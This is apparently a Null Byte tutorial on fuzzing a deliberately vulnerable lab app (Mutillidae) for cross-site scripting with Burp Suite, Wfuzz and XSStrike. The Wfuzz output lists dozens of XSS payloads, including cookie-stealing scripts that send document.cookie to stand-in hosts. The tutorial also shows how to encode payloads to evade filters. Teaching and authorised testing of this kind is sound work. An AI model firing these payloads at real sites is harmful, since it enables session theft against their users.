Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrike

Nov 27, 2018 11:34 PM
636777011317793453.jpg

Cross-site scripting is one of the most common vulnerabilities found on the web today, with repercussions of this type of flaw ranging from harmless defacement to sensitive data exposure. Probing for XSS can be tedious and time-consuming for an attacker, but luckily there are tools available to make things a little easier, including Burp Suite, Wfuzz, and XSStrike.

Fuzzing Overview

Fuzzing is a technique used to test applications for security flaws in an automated fashion. The fuzzer, a piece of software designed to test for these flaws, provides malformed or random data as input to a program in order to find bugs, usually leading to vulnerabilities in the context of security. Generated input can be static, such as values loaded from a list, or random, and new fuzzers are even starting to use algorithms to dynamically generate and input data.

We will be using Mutillidae, a vulnerable web application, to test for XSS flaws. To get started, open up Mutillidae, and on the left, browse to "OWASP Top 10," then "Cross Site Scripting," followed by "Reflected," and finally "DNS Lookup." This will be our entry point for XSS fuzzing.

636776993863262966.jpg

App 1: Burp Suite

Burp Suite is a powerful tool used to test web applications for vulnerabilities. The free Community Edition is included in Kali Linux. In its most common utilization, Burp is used as a proxy to intercept and modify requests.

We need to configure our browser to work with Burp. In Firefox, go to "Preferences," and scroll all the way down to the section titled Network Proxy. Click on the "Settings" button, select "Manual proxy configuration," and enter 127.0.0.1 as the HTTP Proxy and 8080 as the Port. Now, check "Use this proxy server for all protocols," and make sure it is blank under No Proxy for.

636776995453262271.jpg

Finally, click "OK," and everything should be configured correctly. You can then fire up Burp Suite and start a new project. Navigate to the "Proxy" tab and ensure the "Intercept is on" button is pressed. This will allow us to modify the request and fuzz for XSS.

636789283964826638.jpg

Next, back in Mutillidae, enter a value in the Hostname/IP text box, and hit "Lookup DNS" to submit the request (I just used 127.0.0.1 – it doesn't really matter here). The request should show up in Burp now.

636789284124826478.jpg

Right-click anywhere in the request window, and select "Send to Intruder," then navigate to the "Intruder" tab. We will use the "Sniper" attack type to iterate through a list of payloads. Burp will automatically select positions to use, which are the parameters to test, but for now, we only need one. Hit the "Clear" button on the right, highlight the target host we entered earlier, and hit the "Add" button.

636789288069827293.jpg

Next, go to the "Payloads" tab, and under Payload Options, press "Load." There is a useful wordlist located at /usr/share/wfuzz/wordlist/Injections/XSS.txt — browse to it and we are ready to launch the attack.

636789289942793446.jpg

Press "Start attack," and a new window will pop up. Once the attack has iterated through all the payloads in our wordlist, the attack is finished and we can see all the requests and their status codes.

636789293575762823.jpg

To demonstrate, let's take a look at request number 3. If we paste this payload into the DNS Lookup utility, an alert box will pop up proving that this page is indeed vulnerable to XSS.

636776999735606041.jpg

Before we move on to other tools, make sure your browser's proxy configuration is changed back to use system settings.

App 2: Wfuzz

Wfuzz is another popular tool used to fuzz applications not only for XSS vulnerabilities, but also SQL injections, hidden directories, form parameters, and more. It is included in Kali by default.

To display help settings, type wfuzz -h at the terminal.

wfuzz -h

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
*                                                      *
* Version up to 1.4c coded by:                         *
* Christian Martorella (cmartorella@edge-security.com) *
* Carlos del ojo (deepbit@gmail.com)                   *
*                                                      *
* Version 1.4d to 2.2.11 coded by:                     *
* Xavier Mendez (xmendez@edge-security.com)            *
********************************************************

Usage:	wfuzz [options] -z payload,params <url>

	FUZZ, ..., FUZnZ  wherever you put these keywords wfuzz will replace them with the values of the specified payload.
	FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.

Options:
	-h      		    : This help
	--help			    : Advanced help
	--version		    : Wfuzz version details
	-e <type>		    : List of available encoders/payloads/iterators/printers/scripts
	
	-c			    : Output with colors
	-v			    : Verbose information.
	--interact		    : (beta) If selected,all key presses are captured. This allows you to interact with the program.
	
	-p addr			    : Use Proxy in format ip:port:type. Repeat option for using various proxies.
				      Where type could be SOCKS4,SOCKS5 or HTTP if omitted.

...

We will be testing the same page in Mutillidae for XSS vulnerabilities. Basic usage of Wfuzz includes specifying a wordlist file including the payloads to use with the -z flag, and the URL to test, replacing the parameter in question with FUZZ. We can also set the -c flag to get color output.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt http://172.16.1.102/mutillidae/index.php?page=FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://172.16.1.102/mutillidae/index.php?page=FUZZ
Total requests: 39

==================================================================
ID	Response   Lines      Word         Chars          Payload
==================================================================

000020:  C=200    514 L	    1425 W	  21898 Ch	  "<IMG%20SRC=`javascript:alert("'WXSS'")`>"
000019:  C=200    514 L	    1425 W	  21812 Ch	  "<IMG%20SRC=javascript:alert(&quot;WXSS&quot;)>"
000021:  C=200    514 L	    1425 W	  21983 Ch	  "<IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>">"
000001:  C=200    514 L	    1420 W	  21769 Ch	  ""><script>""
000003:  C=200    514 L	    1420 W	  21907 Ch	  "<<script>alert("WXSS");//<</script>"
000016:  C=200    514 L	    1425 W	  21877 Ch	  "<IMG%20SRC="javascript:alert('WXSS')""
000015:  C=200    514 L	    1425 W	  21893 Ch	  "<IMG%20SRC="javascript:alert('WXSS');">"
000002:  C=200    514 L	    1420 W	  21870 Ch	  "<script>alert("WXSS")</script>"
000018:  C=200    514 L	    1425 W	  21858 Ch	  "<IMG%20SRC=JaVaScRiPt:alert('WXSS')>"
000017:  C=200    514 L	    1425 W	  21858 Ch	  "<IMG%20SRC=javascript:alert('WXSS')>"
000022:  C=200    514 L	    1425 W	  21973 Ch	  "<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>"
000023:  C=200    514 L	    1425 W	  21762 Ch	  "<IMG%20SRC='javasc	ript:alert(document.cookie)'>"
000024:  C=200    514 L	    1425 W	  21757 Ch	  "<IMG%20SRC="jav	ascript:alert('WXSS');">"
000025:  C=200    514 L	    1425 W	  21757 Ch	  "<IMG%20SRC="jav&#x09;ascript:alert('WXSS');">"
000027:  C=200    514 L	    1425 W	  21757 Ch	  "<IMG%20SRC="jav&#x0D;ascript:alert('WXSS');">"
000030:  C=200    514 L	    1425 W	  21903 Ch	  "<IMG%20LOWSRC="javascript:alert('WXSS')">"
000029:  C=200    514 L	    1425 W	  21903 Ch	  "<IMG%20DYNSRC="javascript:alert('WXSS')">"
000026:  C=200    514 L	    1425 W	  21757 Ch	  "<IMG%20SRC="jav&#x0A;ascript:alert('WXSS');">"
000028:  C=200    514 L	    1430 W	  21747 Ch	  "<IMG%20SRC="%20&#14;%20javascript:alert('WXSS');">"
000031:  C=200    514 L	    1425 W	  22060 Ch	  "<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>"
000032:  C=200    514 L	    1425 W	  21727 Ch	  "<IMG%20SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>"
000033:  C=200    514 L	    1425 W	  21727 Ch	  "<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>"
000034:  C=200    514 L	    1425 W	  21727 Ch	  "<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>"
000036:  C=200    514 L	    1425 W	  22191 Ch	  ""><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>"
000037:  C=200    514 L	    1425 W	  22196 Ch	  "%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E"
000035:  C=200    514 L	    1425 W	  21950 Ch	  "'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E"
000039:  C=200    514 L	    1420 W	  21763 Ch	  "'';!--"<XSS>=&{()}"
000038:  C=200    514 L	    1420 W	  22883 Ch	  "';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}"
000005:  C=200    514 L	    1420 W	  21911 Ch	  "'><script>alert(document.cookie)</script>"
000004:  C=200    514 L	    1420 W	  21895 Ch	  "<script>alert(document.cookie)</script>"
000006:  C=200    514 L	    1420 W	  21916 Ch	  "'><script>alert(document.cookie);</script>"
000007:  C=200    514 L	    1420 W	  21776 Ch	  "\";alert('XSS');//"
000008:  C=200    514 L	    1420 W	  21875 Ch	  "%3cscript%3ealert("WXSS");%3c/script%3e"
000009:  C=200    514 L	    1420 W	  21900 Ch	  "%3cscript%3ealert(document.cookie);%3c%2fscript%3e"
000010:  C=200    514 L	    1425 W	  21875 Ch	  "%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E"
000011:  C=200    563 L	    1570 W	  24175 Ch	  "&ltscript&gtalert(document.cookie);</script>"
000012:  C=200    563 L	    1570 W	  24175 Ch	  "&ltscript&gtalert(document.cookie);&ltscript&gtalert"
000013:  C=200    514 L	    1420 W	  21964 Ch	  "<xss><script>alert('WXSS')</script></vulnerable>"
000014:  C=200    514 L	    1425 W	  21913 Ch	  "<IMG%20SRC='javascript:alert(document.cookie)'>"

Total time: 26.54032
Processed Requests: 39
Filtered Requests: 0
Requests/sec.: 1.469462

We can see each request ID, the response code, and information about that request. The payloads from our wordlist file are also included, and near the bottom, there is data including total time and the number of requests. Also of use, when fuzzing an application where many different response codes might be encountered, the --hc flag can be utilized to ignore certain responses, such as 404 codes.

Another helpful feature of Wfuzz is the ability to encode payloads in order to bypass defensive filters more effectively. To list the available encoders, use the following command.

wfuzz -e encoders

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

Available encoders:

  Category      | Name              | Summary
------------------------------------------------------------------------------------------------------------------------
  url_safe, url | urlencode         | Replace special characters in string using the %xx escape. Letters, digits, and
                |                   | the characters '_.-' are never quoted.
  url_safe, url | double urlencode  | Applies a double encode to special characters in string using the %25xx escape.
                |                   | Letters, digits, and the characters '_.-' are never quoted.
  url           | uri_double_hex    | Encodes ALL charachers using the %25xx escape.
  html          | html_escape       | Convert the characters '&', '<' and '>' in string to HTML-safe sequences.
  html          | html_hexadecimal  | Replaces ALL characters in string using the &#xx; escape
  hashes        | base64            | Encodes the given string using base64
  url           | doble_nibble_hex  | Replaces ALL characters in string using the %%dd%dd escape
  db            | mssql_char        | Converts ALL characters to MsSQL's char(xx)
  url           | utf8              | Replaces ALL characters in string using the \u00xx escape
  hashes        | md5               | Applies a md5 hash to the given string
  default       | random_upper      | Replaces random characters in string with its capitals letters
  url           | first_nibble_hex  | Replaces ALL characters in string using the %%dd? escape
  default       | hexlify           | Every byte of data is converted into the corresponding 2-digit hex representatio
                |                   | n.
  url           | second_nibble_hex | Replaces ALL characters in string using the %?%dd escape
  url           | uri_hex           | Encodes ALL charachers using the %xx escape.
  default       | none              | Returns string without changes
  hashes        | sha1              | Applies a sha1 hash to the given string
  url           | utf8_binary       | Replaces ALL characters in string using the \uxx escape
  url           | uri_triple_hex    | Encodes ALL charachers using the %25%xx%xx escape.
  url           | uri_unicode       | Replaces ALL characters in string using the %u00xx escape
  html          | html_decimal      | Replaces ALL characters in string using the &#dd; escape
  db            | oracle_char       | Converts ALL characters to Oracle's chr(xx)
  db            | mysql_char        | Converts ALL characters to MySQL's char(xx)

Simply append the desired encoder (in this case urlencode) to the specified file, separated by a comma, to encode the payloads.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt,urlencode http://172.16.1.102/mutillidae/index.php?page=FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://172.16.1.102/mutillidae/index.php?page=FUZZ
Total requests: 39

==================================================================
ID	Response   Lines      Word         Chars          Payload
==================================================================

000003:  C=200    514 L	    1420 W	  21907 Ch	  "%3C%3Cscript%3Ealert%28%22WXSS%22%29%3B//%3C%3C/script%3E"
000002:  C=200    514 L	    1420 W	  21870 Ch	  "%3Cscript%3Ealert%28%22WXSS%22%29%3C/script%3E"
000001:  C=200    514 L	    1420 W	  21769 Ch	  "%22%3E%3Cscript%3E%22"
000007:  C=200    514 L	    1420 W	  21776 Ch	  "%5C%22%3Balert%28%27XSS%27%29%3B//"
000005:  C=200    514 L	    1420 W	  21911 Ch	  "%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
000009:  C=200    514 L	    1420 W	  21926 Ch	  "%253cscript%253ealert%28document.cookie%29%3B%253c%252fscript%253e"
000008:  C=200    514 L	    1420 W	  21891 Ch	  "%253cscript%253ealert%28%22WXSS%22%29%3B%253c/script%253e"
000004:  C=200    514 L	    1420 W	  21895 Ch	  "%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
000010:  C=200    514 L	    1420 W	  21901 Ch	  "%253Cscript%253Ealert%28%2522X%2520SS%2522%29%3B%253C/script%253E"
000006:  C=200    514 L	    1420 W	  21916 Ch	  "%27%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C/script%3E"
000011:  C=200    514 L	    1420 W	  21924 Ch	  "%26ltscript%26gtalert%28document.cookie%29%3B%3C/script%3E"
000015:  C=200    514 L	    1420 W	  21903 Ch	  "%3CIMG%2520SRC%3D%22javascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000012:  C=200    514 L	    1420 W	  21968 Ch	  "%26ltscript%26gtalert%28document.cookie%29%3B%26ltscript%26gtalert"
000014:  C=200    514 L	    1420 W	  21923 Ch	  "%3CIMG%2520SRC%3D%27javascript%3Aalert%28document.cookie%29%27%3E"
000019:  C=200    514 L	    1420 W	  21934 Ch	  "%3CIMG%2520SRC%3Djavascript%3Aalert%28%26quot%3BWXSS%26quot%3B%29%3E"
000013:  C=200    514 L	    1420 W	  21964 Ch	  "%3Cxss%3E%3Cscript%3Ealert%28%27WXSS%27%29%3C/script%3E%3C/vulnerable%3E"
000016:  C=200    514 L	    1420 W	  21887 Ch	  "%3CIMG%2520SRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22"
000017:  C=200    514 L	    1420 W	  21868 Ch	  "%3CIMG%2520SRC%3Djavascript%3Aalert%28%27WXSS%27%29%3E"
000018:  C=200    514 L	    1420 W	  21868 Ch	  "%3CIMG%2520SRC%3DJaVaScRiPt%3Aalert%28%27WXSS%27%29%3E"
000020:  C=200    514 L	    1420 W	  21908 Ch	  "%3CIMG%2520SRC%3D%60javascript%3Aalert%28%22%27WXSS%27%22%29%60%3E"
000022:  C=200    514 L	    1420 W	  21983 Ch	  "%3CIMG%2520SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E"
000021:  C=200    514 L	    1420 W	  21993 Ch	  "%3CIMG%2520%22%22%22%3E%3CSCRIPT%3Ealert%28%22WXSS%22%29%3C/SCRIPT%3E%22%3E"
000023:  C=200    514 L	    1425 W	  21928 Ch	  "%3CIMG%2520SRC%3D%27javasc%09ript%3Aalert%28document.cookie%29%27%3E"
000025:  C=200    514 L	    1420 W	  21941 Ch	  "%3CIMG%2520SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000024:  C=200    514 L	    1425 W	  21908 Ch	  "%3CIMG%2520SRC%3D%22jav%09ascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000028:  C=200    514 L	    1420 W	  21966 Ch	  "%3CIMG%2520SRC%3D%22%2520%26%2314%3B%2520javascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000027:  C=200    514 L	    1420 W	  21941 Ch	  "%3CIMG%2520SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000030:  C=200    514 L	    1420 W	  21913 Ch	  "%3CIMG%2520LOWSRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22%3E"
000026:  C=200    514 L	    1420 W	  21941 Ch	  "%3CIMG%2520SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000029:  C=200    514 L	    1420 W	  21913 Ch	  "%3CIMG%2520DYNSRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22%3E"
000031:  C=200    514 L	    1420 W	  22118 Ch	  "%3CIMG%2520SRC%3D%27%2526%2523x6a%3Bavasc%2526%2523000010ript%3Aa%2526%2523x6c%3Bert%28document.%2526%2523x63%3Bookie%29%27%3E"
000032:  C=200    514 L	    1420 W	  22562 Ch	  "%3CIMG%2520SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E"
000033:  C=200    514 L	    1420 W	  22967 Ch	  "%3CIMG%2520SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E"
000035:  C=200    514 L	    1420 W	  21996 Ch	  "%27%253CIFRAME%2520SRC%3Djavascript%3Aalert%28%252527XSS%252527%29%253E%253C/IFRAME%253E"
000034:  C=200    514 L	    1420 W	  22507 Ch	  "%3CIMG%2520SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E"
000036:  C=200    514 L	    1420 W	  22191 Ch	  "%22%3E%3Cscript%3Edocument.location%3D%27http%3A//cookieStealer/cgi-bin/cookie.cgi%3F%27%2Bdocument.cookie%3C/script%3E"
000037:  C=200    514 L	    1420 W	  22396 Ch	  "%2522%253E%253Cscript%253Edocument%252Elocation%253D%2527http%253A%252F%252Fyour%252Esite%252Ecom%252Fcgi%252Dbin%252Fcookie%252Ecgi%253F%2527%2520%252Bdocument%252Ecookie%253C%252Fscript%253E"
000038:  C=200    514 L	    1420 W	  22906 Ch	  "%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%3E%3C/SCRIPT%3E%21--%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/SCRIPT%3E%3D%26%7B%7D"
000039:  C=200    514 L	    1420 W	  21796 Ch	  "%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D"

Total time: 27.33954
Processed Requests: 39
Filtered Requests: 0
Requests/sec.: 1.426505

The results are similar to before, but now the each payload is URL encoded.

App 3: XSStrike

The last tool we will look at today is XSStrike. It is a dedicated suite for detecting cross-site scripting vulnerabilities that includes an intelligent payload generator, a fuzzer, a crawler, WAF detection, and more. XSStrike is currently in beta.

Before we can use this tool, we need to download it from GitHub and install it on our machine. The process may vary slightly depending on the system, but for reference, I am using the latest version of Kali. XSStrike works best with Python 3.

Download the tool using the wget utility in the terminal, as seen in the below command.

wget https://github.com/s0md3v/XSStrike/archive/master.zip

Next, extract the archive by typing unzip master.zip and changing into the extracted directory with cd XSStrike-master. Now we should be able to run the tool by typing python3 xsstrike.py at the prompt.

It may throw an error stating that the fuzzywuzzy module is not installed.

python3 xsstrike.py

Traceback (most recent call last):
  File "xsstrike.py", line 35, in <module>
    from core.checker import checker
  File "/root/XSStrike-master/core/checker.py", line 3, in <module>
    from fuzzywuzzy import fuzz
ModuleNotFoundError: No module named 'fuzzywuzzy'

If this is the case, just use pip3 install fuzzywuzzy to install the missing module. Now we should be good to go.

To display the help menu, use the -h flag.

python3 xsstrike.py -h

	XSStrike v3.0-beta

usage: xsstrike.py [-h] [-u TARGET] [--data DATA] [--fuzzer] [--update]
                   [--timeout] [--params] [--crawl] [-l LEVEL] [--headers]
                   [-t THREADS] [-d DELAY] [--skip-poc] [--skip-dom]

optional arguments:
  -h, --help            show this help message and exit
  -u TARGET, --url TARGET
                        url
  --data DATA           post data
  --fuzzer              fuzzer
  --update              update
  --timeout             timeout
  --params              find params
  --crawl               crawl
  -l LEVEL, --level LEVEL
                        level of crawling
  --headers             add headers
  -t THREADS, --threads THREADS
                        number of threads
  -d DELAY, --delay DELAY
                        delay between requests
  --skip-poc            skip poc generation
  --skip-dom            skip dom checking

XSStrike's basic usage is quite simple — use the -u flag followed by the URL to test.

python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php

	XSStrike v3.0-beta

[~] Checking for DOM vulnerabilities
------------------------------------------------------------
52  			//document.getElementById("idSystemInformationHeading").innerHTML = l_loginMessage;
53  			document.getElementById("idHintsStatusHeading").innerHTML = 'Hints: ' + l_hintsStatus;
54  			document.getElementById("idSecurityLevelHeading").innerHTML = 'Security Level: ' + l_securityLevel + ' (' + l_securityLevelDescription + ')';
446 								Google Hacking Database
495 	<a 	onclick="document.location.href='';"
584 				window.localStorage.setItem("LocalStorageTarget","This is set by the index.php page");
585 				window.sessionStorage.setItem("SessionStorageTarget","This is set by the index.php page");
------------------------------------------------------------
[+] Potentially vulnerable objects found
[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 4
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 9256
------------------------------------------------------------
[+] Payload: "><A%0aoNMOUseoveR%0d=%0d(confirm)() x>z
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]

This tool begins by checking for DOM-based XSS vulnerabilities, and the potentially vulnerable parameters are displayed on the screen. Reflected XSS is tested for next, and the interactive payload generator displays the payload and the projected likelihood of success. To continue scanning, hit y at the prompt.

------------------------------------------------------------
[+] Payload: "><d3v%0aONPoINtERENtER+=+(confirm)()>z
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]

We can also skip the DOM-based checking with the --skip-dom option.

python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php --skip-dom

	XSStrike v3.0-beta

[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 4
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 9256
------------------------------------------------------------
[+] Payload: "><HtmL%09oNPoINterENtEr%0d=%0dconfirm() x//
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]

XSStrike also contains fuzzing capabilities used to test filters and WAFs. This can be extremely slow, though, because it uses random delay requests to probe the application. To speed things up, we can set the delay to one second with the -d flag alongside the --fuzzer option.

python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php --skip-dom --fuzzer -d 1

	XSStrike v3.0-beta

[+] WAF Status: Offline
[!] Fuzzing parameter: page
[passed]   <test
[passed]   <test//
[passed]   <test>
[passed]   <test x>
[passed]   <test x=y
[passed]   <test x=y//
[passed]   <test/oNxX=yYy//
[passed]   <test oNxX=yYy>
[passed]   <test onload=x
[passed]   <test/o%00nload=x
[passed]   <test sRc=xxx
[passed]   <test data=asa
[passed]   <test data=javascript:asa
[passed]   <svg x=y>
[passed]   <details x=y//
[passed]   <a href=x//
[passed]   <emBed x=y>
[passed]   <object x=y//
[passed]   <bGsOund sRc=x>
[passed]   <iSinDEx x=y//
[passed]   <aUdio x=y>
[passed]   <script x=y>
[passed]   <script//src=//

...

There are many other features included in this tool, and there are sure to be even more as XSStrike undergoes further development.

Wrap Up

Fuzzing is an extremely useful technique for discovering vulnerabilities in a timely and thorough manner. Today, we explored three fuzzing tools in an effort to find XSS flaws in a vulnerable web application: Burp Suite, Wfuzz, and XSStrike. Knowing how to use tools like these will improve your effectiveness as a white hat hacker and lead you on the path to success.

Cover image by markusspiske/Pixabay; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!